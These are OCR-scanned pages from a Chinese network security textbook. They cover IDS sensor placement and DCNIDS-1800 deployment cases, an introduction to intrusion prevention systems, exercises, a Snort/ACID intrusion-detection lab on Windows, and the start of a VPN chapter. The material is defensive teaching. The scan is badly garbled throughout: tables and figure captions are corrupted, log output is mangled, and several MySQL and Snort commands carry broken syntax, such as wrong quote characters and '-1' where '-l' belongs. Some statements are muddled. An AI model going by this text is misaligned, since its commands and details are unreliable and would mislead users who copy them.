有 时 ,组 织 机 构 将 决定 边界 的 定义 。 例 如 ,工程 部 网 络 通 过 他 们 自己 的 路 由 器 与 财务 部 
网 络 ( 以 及 分 离 其 他 网 络 的 路 由 器 ) 之 间 是 相互 分 离 的 。 为 了 提供 更 多 的 保护 ,通常 还 使 用 
一 个 防火 墙 。 在 任何 一 种 情况 下 ,都 可 以 使 用 一 个 传感器 监视 网 络 之 间 的 数据 流 ,并 验证 
〈 对 于 防火 墙 或 路 由 器 ) 安 全 配置 被 正确 地 进行 了 定义 。 违 反 安全 配置 的 数据 流 将 产生 IDS 
告警 ,可 以 将 其 作为 一 个 信号 ,更 新 防火 墙 或 路 由 器 的 配置 ,因为 这 样 做 是 在 对 安全 策略 的 
不 断 加 强 。 网 络 拓扑 如 图 5-18 所 示 。 

(6) 远程 接 和 人 人 服务器。 传感器 可 以 负责 监视 来 自 拨号 接 人 服务 器 的 数据 流 。 在 
Internet. 上 有 许多 免费 的 工具 软件 ,它们 可 以 在 一 个 指定 的 电话 号 码 范 围 内 进行 拨号 ,寻找 
调制 解 调 器 连接 。 攻 击 者 可 以 在 他 的 计算 机 上 启动 一 个 拨号 工具 软件 ,让 它 运行 几 天 ,试图 
定位 可 能 的 调制 解 调 器 连接 。 稍 后 ,程序 的 输出 会 列 出 调制 解 调 器 的 电话 号 码 ,让 黑客 就 可 
以 尝试 连接 这 些 电话 号 码 。 如 果 这 些 调制 解 调 器 连接 中 的 任何 一 个 具有 较 弱 的 认证 机 制 ， 
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图 5-18 ”内 部 网 络 的 传感器 部 署 位 置 


攻击 者 就 可 以 很 容易 地 渗透 到 网 络 中 。 

因此 , 千 万 不 要 认为 黑客 不 能 确定 拨号 调制 解 调 器 的 电话 号 码 ,从 而 认为 拨号 线路 是 安 
全 的 。 而 且 , 许 多 远程 用 户 使 用 家 庭 计 算 机 ,通过 高 速 Internet 连接 ,持续 地 连接 到 
Internet 上 。 如 果 黑 客 攻破 了 这 些 家 庭 系统 中 的 一 个 ,就 可 以 轻易 地 对 远程 接 人 服务 器 发 
动 攻击 。 远 程 接 入 的 传感器 部 署 位 置 如 图 5-19 所 示 。 





图 5-19 远程 接 入 的 传感器 部 署 位 置 


5. 部 署 案 例 

CD 部 署 案例 一 。 这 是 最 普通 的 部 署 方式 ,一 个 典型 的 孤立 式 部 署 。 环 境 中 有 1 一 5 个 
传感器 .DCNIDS-1800 入 侵 检测 系统 管理 组 件 控制 台 数据库 (包括 数据 库 和 LogServer)、 
报表 和 事件 收集 器 安装 到 一 台 计 算 机 上 。 这 种 部 署 方式 易于 管理 ,管理 员 可 以 通过 对 一 台 
机 器 的 操作 完成 配置 组 件 ,监控 报警 .查看 报表 等 操作 ,如 表 5-3 所 示 。 部 署 1 一 5 个 传感器 
的 网 络 拓扑 如 图 5-20 所 示 。 
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表 5-3 部 署 环境 中 有 1~5 个 传感器 





传感器 计算 机 安装 类 型 安装 的 组 件 
ETE 
Iso 单 台 计算 机 自 定义 15 个 DER 


。 LogServer( 包 括 LogServer 组 件 和 数据 库 ) 


控制 台 /报表 查询 工具 / 寻 





有 件 收集 器 /日 志 服 务 器 


(Console/Report/EC/LogServer) 





传感器 与 主 EC 之 间 进 行 组 
fri üE- Sidi 





dE 


息 的 传递 


1 一 5 个 以 上 的 传感器 
图 5-20 8838 1—5 个 传感器 的 网 络 拓扑 

(2) 部 署 案例 二 。DCNIDS-1800 IDS 管理 组 件 分 布 在 到 两 台 计算 机 上 ,如 表 5-4 所 示 。 
部 署 6 一 10 个 传感器 的 网 络 拓扑 如 图 5-21 所 示 。 
表 5-4 部 署 环境 中 有 6 一 10 个 传感器 

















传 感 器 计 算 机 安装 类 型 安装 的 组 件 
。 控制 台 
EMEN 计算 机 一 自 定义 * i 
计算 机 二 自 定义 。LogServer( 包 括 LogServer 组 件 和 数据 库 ) 
控制 台 
ø 
传感器 日 志 服 务 器 
图 5-21 部 署 6 一 10 个 传感器 的 网 络 拓扑 
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O 部 署 案例 三 。 这 是 常见 的 部 署 方式 ,一 个 典型 的 分 布 式 部 署 。 环 境 中 有 10 一 30 个 
传感器 ,DCNIDS-1800 入 侵 检测 系统 管理 组 件 分 布 在 到 4 台 计算 机 上 。 由 于 传感器 数目 较 





多 ,建议 使 














H SQL Server 数据 库 。 在 这 种 部 署 方式 中 ,有 两 台 EC, 每 台 EC 可 以 接收 15 个 


传感器 的 报警 事件 ,同时 这 两 台 EC 又 可 以 作为 另外 15 个 传感器 的 备份 EC。 当 某 个 EC 出 
现 故 障 的 时 候 , 向 它 发 送 报警 事件 的 传感器 可 以 将 报警 事件 发 送 到 另 一 台 EC。 这 种 部 署 的 
好 处 是 均衡 流量 ,并 保证 在 一 个 EC 发 生 故 障 时 告警 能 够 及 时 送 达 管理 系统 。 控 制 台 和 报 
表 安 装 在 一 台 机 器 上 ,方便 管理 员 查 看 任何 时 段 的 报警 事件 ,如 表 5-5 所 示 , 部 署 10—30 个 
传感器 的 网 络 拓扑 如 图 5-22 所 示 o 


表 5-5 部 署 环境 中 有 10—30 个 传感器 





传 感 器 ip 算 机 安装 类 型 安装 的 组 件 

计算 机 一 自 定 义 。 LogServer( 包 括 LogServer 组 件 和 数据 库 ) 
ea 计算 机 二 自 定义 š EC 

计算 机 三 自 定义 š EC 

计算 机 四 自 定义 。 控制 台 报表 


控制 台 日 志 服 务 器 


事件 
收集 器 





传感器 传感器 
5-22 部 署 10 一 30 个 传感器 的 网 络 拓扑 


(4) 部 署 案 例 四 。 对 多 于 30 个 传感器 的 部 署 ,其 中 将 控制 台 组 件 分 布 到 6 台 计算 机 
上 ,如 表 5-6 所 示 ,部署 多 于 30 个 传感器 的 网 络 拓扑 如 图 5-23 所 示 。 


表 5-6 部 署 环 境 中 多 于 30 个 传感器 





传 感 器 计 算 机 安装 类 型 安装 的 组 件 
计算 机 一 自 定义 。 LogServer( 包 括 LogServer 组 件 和 数据 库 ) 
计算 机 二 自 定义 * EC 
多 于 30 个 HER nex i Ee 
计算 机 四 自 定义 。 EC 
计算 机 五 自 定义 。 报表 


计算 机 六 自 定义 。 控制 台 
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5-23 部署 多 于 30 个 传感器 的 网 络 拓扑 


5.8 人 侵 防 御 系 统 


1. 入 侵 防 御 系 统 简介 

IDS 虽然 存在 多 年 ,但 IDS 只 能 被 动 地 检测 攻击 ,而 不 能 主动 地 把 变化 莫 测 的 威胁 阻止 
在 网 络 之 外 。 因 此 ,迫切 需要 找到 一 种 主动 人 侵 防护 解决 方案 ,确保 企业 网 络 在 威胁 四 起 的 
环境 下 正常 运行 。 

入 侵 防 御 系 统 (Intrusion Prevention System,IPS) 是 一 种 智能 化 的 入 侵 检 测 和 防御 产 
品 , 它 不 但 能 检测 人 侵 的 发 生 ,而 且 能 通过 一 定 的 响应 方式 ,实时 地 中 止 人 侵 行为 的 发 生 和 
发 展 ,实时 地 保护 信息 系统 不 受 实质 性 的 攻击 。IPS 使 得 IDS 和 防火 墙 走向 统一 ,简单 地 理 
解 ,可 认为 IPS 就 是 防火 墙 加 上 IDS, 但 并 不 是 说 IPS 可 以 代替 防火 墙 或 IDS。 防 火 墙 是 粒 
度 比较 粗 的 访问 控制 产品 , 它 在 基于 TCP/IP 协议 的 过 滤 方 面 表现 出 色 , 可 以 提供 NAT Ll 
务 代 理 .流量 统计 `VPN 等 功能 。 

和 防火 墙 比较 ,IPS 功能 比较 单一 ,只 能 串联 在 网 络 上 ,对 防火 墙 所 不 能 过 滤 的 攻击 进 
行 过 滤 ; 这 样 一 个 两 级 的 过 滤 模 式 , 可 以 最 大 限度 地 保证 系统 的 安全 。 一 般 来 说 ,企业 用 户 
关注 的 是 自己 的 网 络 能 否 避 免 被 攻击 ,对 于 能 检测 到 多 少 攻击 并 不 关心 ; 但 这 并 不 是 说 
IDS 就 没有 用 处 ,在 一 些 专 业 机 构 或 对 网 络 安全 要 求 比较 高 的 地 方 ,IDS 和 其 他 审计 产品 结 
合 ,可 以 提供 针对 企业 信息 资源 全 面 的 审计 资料 ,这 些 资料 对 于 攻击 还 原 、 入 侵 取证 、 异 常事 
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件 识 别 、 网 络 故障 排除 等 都 有 很 重要 的 作用 。 

2. 入 侵 防 御 系 统 的 功用 

IPS 具有 以 下 明显 的 工作 特性 。 

CD 检测 并 终止 人 侵 活 动 。NIDS 采用 混杂 模式 被 动 侦 听 。IPS 支持 多 种 监控 模式 ,如 
Span( 接 到 交换 机 映像 端口 ) .Tap( 通 过 分 接 器 ) .In Line( 串 联 )、Port Cluster( 端 口 群 集 ) 
等 ,用 户 根据 实际 情况 选择 。 采 用 串联 方式 的 IPS 位 于 防火 墙 之 后 ,是 防火 墙 后 面 的 第 二 道 
闸门 ,进出 的 数据 包 都 要 经 过 IPS 的 内 容 检查 ,攻击 数据 流 在 到 达 目标 之 前 ,会 被 IPS 识别 
出 来 并 丢弃 或 阻 断 。IPS 底层 设计 使 用 专用 集成 电路 ASIC FPGA 等 ,可 以 实现 线 速 检 
测 , 从 而 确保 不 会 成 为 影响 网 络 性 能 的 瓶颈 。 

(2) 检测 准确 .可 靠 。IPS 采用 多 种 检测 技术 : 特征 检测 可 以 准确 检测 已 知 攻击 ,特征 
库 实现 在 线 升级 并 且 不 需要 重新 启动 探测 器 ; 异常 检测 基于 对 监控 网 络 的 自学 习 能 力 ,可 
以 有 效 检测 新 出 现 的 攻击 ; DoS/DDoS 检测 专门 的 针对 拒绝 服务 攻击 ; 检测 引擎 中 集成 了 
针对 缓冲 区 溢出 等 特定 攻击 的 检测 。IPS 使 用 硬件 加 速 技术 完成 串 匹 配 、 更 新 训练 集 等 重 
复 性 计算 ,加 快 了 入 侵 检测 的 速度 和 准确 率 。 

(3) 主动 防御 。IDS 采用 被 动 侦 听 方式 ,响应 能 力 有 限 , 如 发 送 TCP Reset 包 终 止 会 话 
时 往往 已 经 为 时 太 晚 。 采 用 串联 监控 方式 的 IPS 具有 强大 的 主动 响应 能 力 , 在 攻击 流 到 来 
之 前 ,就 可 以 丢弃 数据 包 终止 会 话 .修改 防火 墙 策略 .实时 报警 或 记录 日 志 等 。 这 种 主动 防 
御 的 响应 能 力 正 是 企业 网 络 安全 真正 需要 的 。 

总 之 ,IPS 担负 双重 使 命 : 逐步 取代 IDS; 在 互 操作 性 和 功能 上 与 防火 墙 融合 。 

3. 入 侵 防 御 系统 的 分 类 

IPS 通常 是 位 于 防火 墙 和 网 络 设备 之 间 的 设备 。 这 样 , 如 果 检 测 到 攻击 ,IPS 会 在 这 种 
攻击 扩散 到 网 络 的 其 他 地 方 之 前 阻止 这 个 恶意 通信 。 而 IDS 只 是 存在 于 你 的 网 络 之 外 起 
到 报警 的 作用 ,而 不 是 在 你 的 网 络 前 面 起 到 防御 的 作用 。 

目前 有 很 多 种 IPS 系统 ,使 用 的 技术 都 不 相同 。 一 般 来 说 ,IPS 系统 都 依靠 对 数据 包 的 
检测 。IPS 将 检查 人 网 的 数据 包 ,确定 这 种 数据 包 的 真正 用 途 , 然 后 决定 是 否 允 许 这 种 数据 
包 进 入 你 的 网 络 。 

IPS 系统 分 为 基于 主机 和 网 络 两 种 类 型 。 

(1) 基于 主机 的 IPS(Host IPS, HIPS)。 依 靠 在 被 保护 的 系统 中 直接 安装 代理 。 它 与 
操作 系统 内 核 和 服务 紧密 地 捆绑 在 一 起 ,监视 并 截取 对 内 核 或 API 的 系统 调用 ,以 便 达 到 
阻止 并 记录 攻击 的 目的 。 它 也 可 以 监视 数据 流 和 特定 应 用 的 环境 (如 网 页 服务 器 的 文件 位 
置 和 注册 条 目 ), 以 便 能 够 保护 该 应 用 程序 ,使 之 能 够 避免 那些 还 不 存在 签名 的 、 普 通 的 
攻击 。 

(2) 基于 网 络 的 IPSCNetwork IPS,NIPS) 。 综 合 了 标准 IDS 的 功能 ,IDS 是 IPS 与 防 
火 墙 的 混合 体 ,并 可 被 称 为 嵌入 式 IDS 或 网 关 IDSCGate IDS, GIDS), NIPS 设备 只 能 阻止 
通过 该 设备 的 恶意 信息 流 。 为 了 提高 IPS 设备 的 使 用 效率 ,必须 采用 强迫 信息 流通 过 该 设 
备 的 方式 。 

更 为 具体 地 说 , 受 保护 的 信息 流 必 须 代 表 着 向 联网 计算 机 系统 或 从 中 发 出 的 数据 , 且 在 
其 中 : 指定 的 网 络 领域 中 ,需要 高 度 的 安全 和 保护 ; 该 网 络 领域 中 存在 极 可 能 发 生 的 内 部 
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爆发 配置 地 址 ; 能 够 有 效 地 将 网 络 划分 成 最 小 的 保护 区 域 , 并 能 够 提供 最 大 范围 的 有 效 覆 
F 

4. 入 侵 防 御 系 统 的 工作 原理 

IPS 串联 于 通信 线路 之 内 ,是 既 具 有 IDS 的 检测 功能 ,又 能 够 实时 终止 网 络 入 侵 行为 的 
新 型 安全 技术 设备 。IPS 由 检测 和 防御 两 大 系统 组 成 ,具备 从 网 络 到 主机 的 防御 措施 与 预 
先 设 定 的 响应 设置 ,如 图 5-24 所 示 。 
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524 ”入 侵 防 御 系统 原理 示意 图 


5. 入 侵 防 御 系 统 的 弱点 与 局 限 

IPS 和 IDS 都 采用 了 入 侵 检测 技术 ,目前 和 人 侵 检测 技术 被 用 户 诉 病 最 多 的 就 是 误 报 和 
滥 报 。 在 旁 路 检测 的 IDS 中 , 误 报 和 滥 报 经 过 人 工分 析 后 可 以 滤 掉 ,不 会 对 网 络 造成 任何 
影响 ; 而 串 行 部 署 的 IPS, 一 旦 发 生 了 误 报 或 者 滥 报 ,将 影响 用 户 的 正常 网 络 通信 。 这 就 决 
定 了 IPS 目 前 面临 的 主要 问题 , 即 精确 判断 和 阻 断 攻击 。 

从 技术 同 源 上 来 看 ,IPS 和 IDS 之 间 有 着 千 丝 万 缕 的 联系 ,IPS 可 以 被 视 作 是 增加 了 主 
动 阻 断 功 能 的 IDS, 并 且 IPS 在 性 能 和 数据 包 的 分 析 能 力 方 面 比 IDS 有 了 质 的 提升 。 

由 于 增加 了 主动 阻 断 能 力 ,检测 准确 程度 的 高 低 对 于 IPS 十 分 关键 。 除 了 检测 机 制 外 ， 
IPS 的 检测 准确 率 还 依赖 于 应 用 环境 ,一 些 流量 对 于 某 些 用 户 来 说 是 恶意 的 ,而 对 于 另外 的 
用 户 来 说 是 正常 流量 ,这 就 需要 IPS 针对 用 户 的 特定 需求 提供 灵活 、 易 用 的 策略 调 优 手 段 ， 
以 提高 检测 准确 率 。 





习 题 5 


5-31 什么 是 入 侵 检 测 系统 ? 
52 ”入 侵 检测 系统 有 哪些 类 型 ? 
5-3 人 侵 检测 系统 有 哪些 缺陷 ? 
5-4 什么 是 入 侵 防 御 系 统 ? 
5-5 人 侵 防御 系统 有 哪些 类 型 ? 
5-6 ”入 侵 防御 系统 有 哪些 缺陷 ? 
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5-7 入侵 检测 系统 与 人 侵 防 御 系 统 有 哪些 异同 ? 
5-8 什么 是 统一 威胁 管理 ? 
5-9 统一 威胁 管理 与 传统 安全 设备 的 关系 是 什么 ? 


实 训 5.1 Snort 系统 的 配置 和 应 用 


Snort 是 美国 Sourcefire 公司 开发 的 发 布 在 GPL v2 下 的 IDS 软件 ,有 3 种 工作 模式 ， 
即 嗅 探 器 .数据 包 记录 器 .NIDS 模式 。 嗅 探 器 模式 仅仅 是 从 网 络 上 读 取 数据 包 并 作为 连续 
不 断 的 流 显 示 在 终端 上 。 数 据 包 记录 器 模式 把 数据 包 记录 到 硬盘 上 。 网 路 入侵 检 测 模式 分 
析 网 络 数据 流 以 匹配 用 户 定义 的 一 些 规则 ,并 根据 检测 结果 采取 一 定 的 动作 。NIDS 模式 
是 最 复杂 且 是 可 配置 的 。Snort 除 可 以 用 来 监测 各 种 数据 包 ( 如 端口 扫描 等 ) 之 外 ,还 提供 
了 以 XML 形式 或 数据 库 形 式 记录 日 志 的 各 种 插件 。 


【 实 训 目的 】 

CD 通过 实验 深入 理解 入 侵 检测 系统 的 原理 和 工作 方式 。 

(2) 熟悉 入 侵 检测 工具 Snort 在 Windows 操作 系统 中 的 安装 和 配置 方法 。 
【 实 训 环 境 】 


实验 室 所 有 机 器 安装 了 Windows 2003 操作 系统 ,并 附带 Apache, PHP, MySQL, 
Snort,adodb acid ,jpgrapy、winpcap 等 软件 的 安装 包 。 


【 实 训 内 容 】 


1. 安装 Apache 
CD 选择 定制 安装 ,安装 路 径 修改 为 C:Napache, 这 样 与 后 面 的 参数 设置 保持 一 致 。 
(2) 在 命令 行 窗口 输入 下 面 的 命令 ,启动 Apache 服务 ， 


net start apache2 


2. 安装 PHP 

(1) 解压 缩 php-4. 3. 2-Win32. zip 至 C:\php。 
(2) 复制 php4ts. dll 至 C:\Windows\system32。 
(3) 复制 php. ini-dist 至 C:\Windows\php. ini, 
(4) 修改 php. ini; 


extension = php gd2.dll 


(5) 将 Ci NphpVextensionV php. gd2. dll 复制 到 C:\Windows\( 注 : 以 上 添加 gd 图 形 库 
支持 ) 。 
(6) 在 httpd. conf 中 添加 : 


LoadModule php4 module "c:/php/sapi/php4apache2. d11" 
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AddType application/x— httpd - php. php 


(7) 在 c:Napache2\htdocs 目录 下 新 建 test. php 文件 ,test. php 文件 的 内 容 为 ， 


<?phpinfo( )?> 


(8) 打开 浏览 器 ,输入 http://127.0. 0. 1/test. php, 测 试 php 是 否 安装 成 功 。 
安装 成 功 后 的 页 面 如 图 5-25 所 示 。 





图 5-25 PHP 运行 页 面 


3. 安装 配置 MySQL 数据 库 
CD 默认 安装 到 C:\mysql, 新 建 my. ini 并 复制 到 C:\Windows\ 下 ,其 中 my. ini 的 内 
容 为 : 


[mysqld] 

basedir =c:\mysql 

bind - address = 127.0.0.1 
datadir = c:\mysql\data 


(2) 启动 MySQL 服务 ,在 命令 行 窗口 执行 命令 : 


mysqld - install 
net start mysql 


(3) 配置 root H; 


c: V» cd mysqlVbin 
c:\mysql\bin > mysql 
mysql > set password for "root" @"localhost" = password('newPWD'); 


注意 : 这 里 newPWD 为 用 户 自己 设置 的 口令 。 
(4) 以 root 身份 登录 : 


Mysql -u root -p 


4. 安装 Snort 


(1) 默认 安装 到 C:\snort 下 ,然后 在 命令 行 窗口 输入 下 面 的 命令 ,建立 Snort 运行 必需 
的 snort 库 和 snort_archive J£ : 
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mysql > create database snort; 
mysql > create database snort archive; 


(2) 在 命令 行使 用 C:\snort\contrib 目录 下 create. mysql 脚本 建立 Snort 运行 必需 的 
数据 表 : 


c:\mysql\bin\mysql - D snort - u root ~p<c:\snort\contrib\create mysql; 
c:\mysql\bin\mysql - D snort_archive - u root -p < 
c:\snort\contrib\create mysql; 


(3) 在 命令 行 窗口 建立 acid 和 snort 用 户 , 或 者 采用 phpmyadmin 进行 操作 : 


mysql» grant usage on * . * to "acid"(@@"localhost" identified by "acidpassword"; 
mysql» grant usage on * . * to "snort"(d"localhost" identified by "snortpassword' 


(4) JJ acid HI P! fI snort 用 户 分 配 相 关 权 限 : 





mysql > grant select, insert, update, delete, create, alter on snort . x to "acid"@ "localhost"; 
mysql > grant select, insert on snort . * to "snort"(à"localhost"; 

mysql > grantselect, insert, update, delete, create, alter on snort archive . * to "acid" @ 
"localhost"; 


这 一 步 也 可 以 采用 phpmyadmin 进行 操作 。 
5. 安装 配置 adodb acid 


(1) 解压 缩 adodb360. zip 至 C: NphpNadodb 目录 下 ,解压 缩 acid-0. 9. 6b23. tar. gz 至 
C:Napache2\htdocsNacid 目录 下 。 
(2) 修改 acid. conf. php X fff : 


$ DBlib path = "c:VphpNVadodb" ; 

$alert dbname = "snort"; 

$alert host = "localhost"; 

$alert port = ""; 

$alert user = "acid"; 

$alert password = "acidpassword"; 

/ * Archive DB connection parameters * / 
$ archive dbname = "snort archive"; 

$ archive host = "localhost"; 
$archive port = ""; 

$archive user = "acid"; 

$ archive password - " acidpassword "; 
$ ChartLib path = "c:\php\jpgraph\src"; 


(3) 打开 浏览 器 ,输入 http: //127. 0. 0. 1/acid/acid db setup. php ,按照 系统 提示 建立 
acid 运行 必需 的 数据 库 。 

6. 安装 jpgrapg FE 

COD 解压 缩 jpgraph-1. 12. 2. tar. gz Æ C:\php\jpgraph。 

(2) 修改 jpgraph. php: 


DEFINE("CACHE DIR","/tmp/jpgraph cache/") (取消 原来 的 注释 ) 
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改 为 


7. 安装 winpcap 

单 击 图 5-25 中 出 现 的 "下 一 步 ?图 标 , 直 接 安装 winpcap。 
8. 配置 Snort 

(1) 编辑 C: NsnortVeteVsnort. conf ,需要 修改 的 地 方 包括 : 


include classification. config 


include reference. config 
绝对 路 径 : 


include c:\snort\etc\classification. config 
include c:\snort\etc\reference. config 


(2) 设置 Snort 输出 alert 到 MySQL Server: 


output database: alert, mysql, host = localhost user = snort password = snort dbname = snort 


9. 测试 Snort 
CD 输入 命令 ,运行 Snort: 
c:\snort\bin> snort -c "c:\snort\etc\snort. conf" -1 "c:\snort\log" - vdeX 


其 中 : 

-X 参数 用 于 在 数据 链接 层 记录 raw packet 数据 。 
-d 参数 记录 应 用 层 的 数据 。 

-e 参数 显示 /记录 第 二 层 报 文 头 数据 。 

-c 参数 用 以 指定 Snort 的 配置 文件 的 路 径 ; 

-v 参数 用 于 在 屏幕 上 显示 被 抓 到 的 包 ; 

(2) 启动 Apache 和 MySQL 服务 : 

net start apache2 

mysqld - install 

net start mysq1 


(3) 运行 acid: 打开 浏览 器 ,地 址 为 http://127. 0.0. 1/acid, [E 5-26 所 示 为 acid 安装 


成 功 。 


(4) 在 命令 行 运行 Snort, 在 运行 中 输入 命令 : 
c:\snort\bin\snort - c "c:\snort\etc\snort. conf" —1"c:\snort\log"— de 
如 果 Snort 正常 运行 , 则 如 图 5-27 所 示 。 


10. 开始 检测 
(1) 配置 snort. conf 文件 ,将 var HOME. NET any 语句 中 的 any 改 为 自己 所 在 的 子 网 


地 址 ,即将 Snort 监测 的 内 网 设置 为 本 机 所 在 局 域 网 。 


EX 
到 的 


(2) 设置 snort. conf 文件 中 的 rule 规则 ,将 并 include 前 的 井 去掉, 表示 启 用 此 条 规则 。 
上 一 步 启 动 Snort 并 用 浏览 器 打开 acid 控制 台 , 单 击 TCP 后 的 数字 ,将 显示 所 有 检测 
TCP 协议 和 数据 包 的 详细 情况 ,如 图 5-28 所 示 。 


Do 
25 
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图 5-26 acid 安装 成 功 
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图 5-28 ”检测 TCP 数据 包 
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(3) 不 要 关闭 Snort, 7 JF SuperScan 对 检测 网 段 扫 描 , 打 开 acid 查看 检测 结果 ,如 
图 5-29 所 示 。 












Source 
Address 








1941255] 21: 155. 202.109.73.254 ICMP 
1141236) 59.64.155.74 202.109.73.235 ICMP 
241235) 20050325 5:21:28 52.54.5574 202.409.73.234 ICMP 
#3123) 2005-09-26 '5:21:28 59.64.155.74 212.109.73 233 ICMP 
864413233) 2005-09-26 52128 59.64.155.74 202.109.73.232 ICMP 
541232) 2005-09-26 5:21:28 59.64.155.74 202.109.73 231 ICMP 
#6.(1231) 20050926 '5:21:28 58.64.155.74 202.109.73.230 ICMP 
8141230) 2005-03-26 75:21:28 58.64.155.74 202.109.73.229 ICMP 
8841223) 20050926 52128 58.64,155.74 202.109.73.228. ICMP 
(941220) 2005-03-26 52128 59.64.155.74 202.109.73.227 ICMP 
80.(1227) 20050226 5:21:28 58.64.155.74 202.109.73.226. ICMP 
141226) 2005.09-26 521.26 59.64,155.74 202.109.73.225 ICMP 
3241224) 20050326 5:21:28 58.54.1574 200.109.3223 ICMP 
#13411223) 2005-09-26 '5:21:26 59.64.155.74 202.109.73 22? ICMP 
HE22 20050928 5:21:28. 50.64.1554 202.109.2321 ICMP 
#1501221) 2005-09-26 5:21:28 59.64.155.74 202.109.73.220 ICMP 











5-29 acid 检测 结果 


9s 6 章 虚拟 专用 网 技术 


本 章 介绍 VPN( Virtual Private Network ,虚拟 专用 网 络 ) 的 基本 概念 、 分 类 .关键 技术 
和 安全 协议 ,重点 介绍 Windows Server 2008 的 VPN 实现 和 硬件 VPN. 


6.1 VPN 的 基本 概念 


随 着 互联 网 的 兴起 ,企业 开始 寻求 利用 互联 网 来 扩展 他 们 的 网 络 。 首 先 出 现 的 是 
Intranet( 企 业内 部 互联 网 ) ,这 是 一 种 专 供 公司 员工 使 用 而 设计 的 站 点 ,有 口令 保护 。 很 多 
公司 都 搭建 了 自己 的 VPN, 以 满足 远程 员工 和 分 公司 的 需求 。 

从 原理 上 来 说 ,VPN 就 是 利用 公用 网 络 把 远程 站 点 或 用 户 连接 到 一 起 的 专用 网 络 。 与 
使 用 实际 的 专用 连接 (如 租用 线路 ) 不 同 ,VPN 使 用 的 是 通过 互联 网 路 由 的 “虚拟 ”连接 ,把 
公司 的 专用 网 络 与 远程 站 点 或 员工 连接 到 一 起 。 一 个 典型 的 VPN 可 能 包括 公司 总 部 的 主 
LAN .远程 分 公司 或 分 支 机 构 的 其 他 LAN 以 及 从 网 络 外 部 连接 进来 的 个 人 用 户 , 如 图 6-1 


所 示 。 
ve 
frt naa 





生意 伙伴 移动 x 
工作 人 员 


6-1 一 个 典型 VPN 示意 图 


VPN 是 近年 来 随 着 Internet 的 广泛 应 用 而 迅速 发 展 起 来 的 一 种 新 技术 ,实现 在 公共 网 
络 上 构建 私人 专用 网 络 .“ 虚 拟 ” 主 要 是 指 这 种 网 络 是 一 种 逻辑 上 的 网 络 。 

VPN 对 用 户 透 明 , 用 户 感觉 不 到 其 存在 ,就 好 像 使 用 了 一 条 专用 线路 在 自己 的 计算 机 
和 远程 的 企业 内 部 网 络 之 间 ,或 者 在 两 个 异地 的 内 部 网 络 之 间 建 立 连接 ,以 进行 数据 的 安全 
传输 。 虽 然 VPN 建立 在 公共 网 络 的 基础 上 ,但 是 用 户 在 使 用 VPN 时 感觉 如 同 在 使 用 专用 
网 络 进 行 通 信 , 所 以 称 之 为 “虚拟 ?专用 网 络 ,如 图 6-2 所 示 。 
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图 6-2 VPN 连接 示意 图 





VPN 可 以 通过 特殊 的 加 密 的 通信 协议 在 连接 在 Internet 上 的 位 于 不 同 地 方 的 两 个 或 
多 个 企业 内 部 网 之 间 建 立 一 条 专 有 的 通信 线路 ,就 好 比 架设 了 一 条 专线 一 样 ,但 是 它 并 不 需 
要 真正 地 去 铺设 光线 之 类 的 物理 线路 。 一 句 话 ,VPN 的 核心 就 是 利用 公共 网 络 建立 虚拟 私 
有 网 络 。 

VPN 是 依靠 ISP(Internet 服务 提供 商 ) 和 其 他 NSP( 网 络 服务 提供 商 ) ,在 公用 网 络 中 
建立 专用 的 数据 通信 网 络 的 技术 ,如 图 6-3 所 示 。 





6-3 ”专用 数据 通信 网络 示意 图 


在 该 网 中 的 主机 将 不 会 觉察 到 公共 网 络 的 存在 ,仿佛 所 有 的 主机 都 处 于 一 个 网 络 之 中 。 
公共 网 络 仿佛 是 只 由 本 网 络 在 独占 使 用 , VPN 使 用 户 节省 了 租用 专线 的 费用 。 除 了 购买 
VPN 设备 ,企业 所 付出 的 仅仅 是 向 企业 所 在 地 ISP 支付 一 定 的 上 网 费用 ,也 节省 了 长 途 电 
话费 。 

VPN 被 定义 为 通过 一 个 公用 网 络 ( 通 常 是 因特网 ) 建 立 一 个 临时 的 、 安 全 的 连接 ,是 一 
条 穿 过 混乱 的 公用 网 络 的 安全 稳定 的 隧道 。 使 用 这 条 隧道 可 以 对 数据 进行 几 倍加 密 以 达 
到 安全 使 用 互联 网 的 目的 ,如 图 6-4 所 示 。 
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使 用 PPTP 或 ISP 的 PPP 使 用 PPTP 或 L2TP 企业 专用 
L2TP 的 VPN 连 接 服务 器 的 VPN 服 务 器 网 络 


6-4 VPN 隧道 示意 图 


6.2 VPN 的 分 类 


VPN 有 3 种 类 型 , 即 远程 访问 虚拟 网 (Access VPN), 企 业内 部 虚拟 网 (Intranet 
VPN) ,企业 扩展 虚拟 网 (Extranet VPN), 

1. 远程 访问 虚拟 网 

远程 访问 虚拟 网 也 称 为 虚拟 专用 拨号 网 络 (VPDN) ,是 一 种 用 户 到 LAN 的 连接 , 通 
常用 于 员工 需要 从 各 种 远程 位 置 连接 到 的 专用 网 络 。 一 般 来 说 ,公司 都 会 把 搭建 大 型 远 
程 访问 VPN 的 工作 外 包 给 企业 服务 提供 商 (ESP)。ESP 首先 建立 一 个 网 络 访问 服务 器 
(NAS) ,并 向 远程 用 户 提供 用 于 他 们 计算 机 的 桌面 客户 端 软件 。 然 后 ,远程 工作 者 通过 
拨打 免费 号 码 连 接 NAS, 并 使 用 他 们 的 VPN 客户 端 软件 访问 公司 网 络 。 典 型 的 需要 使 
用 远程 访问 VPN 的 公司 是 拥有 数 百 个 销售 人 员 的 大 型 公司 。 远 程 访问 VPN 能 够 通过 
第 三 方 服务 提供 商 在 公司 专用 网 络 和 远程 用 户 之 间 实 现 加 密 的 安全 连接 ,如 图 6-5 
所 示 。 





图 6-5 Access VPN 示意 图 


利用 专用 设备 和 大 规模 加 密 ,公司 可 以 通过 公用 网 络 连 接 到 多 个 固定 的 站 点 。 站 点 到 
站 点 式 VPN 有 以 下 两 种 类 型 。 
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2. 企业 内 部 虚拟 网 

基于 Intranet 一 一 如 果 公 司 有 一 个 或 多 个 远程 位 置 想 要 加 入 到 一 个 专用 网 络 中 ,可 以 
建立 一 个 Intranet VPN, 将 LAN 连接 到 另 一 个 LAN , 称 为 企业 内 部 虚拟 网 (Intranet VPN) ,如 
图 6-6 所 示 。 


























网 关 VPN 网 关 VPN 


图 6-6 Intranet VPN 示意 图 


3. 企业 扩展 虚拟 网 

基于 Extranet 一 一 如 果 公 司 同 其 他 公司 (如 合作 伙伴 、 供 应 商 或 客户 ) 的 关系 紧密 ,他 们 
可 以 建立 一 个 Extranet VPN, 以 便 将 LAN 连接 到 另 一 个 LAN ,同时 让 所 有 公司 都 能 在 一 
个 共享 环境 中 工作 , 称 为 企业 扩展 虚拟 网 (Extranet VPN) ,如 图 6-7 所 示 。 





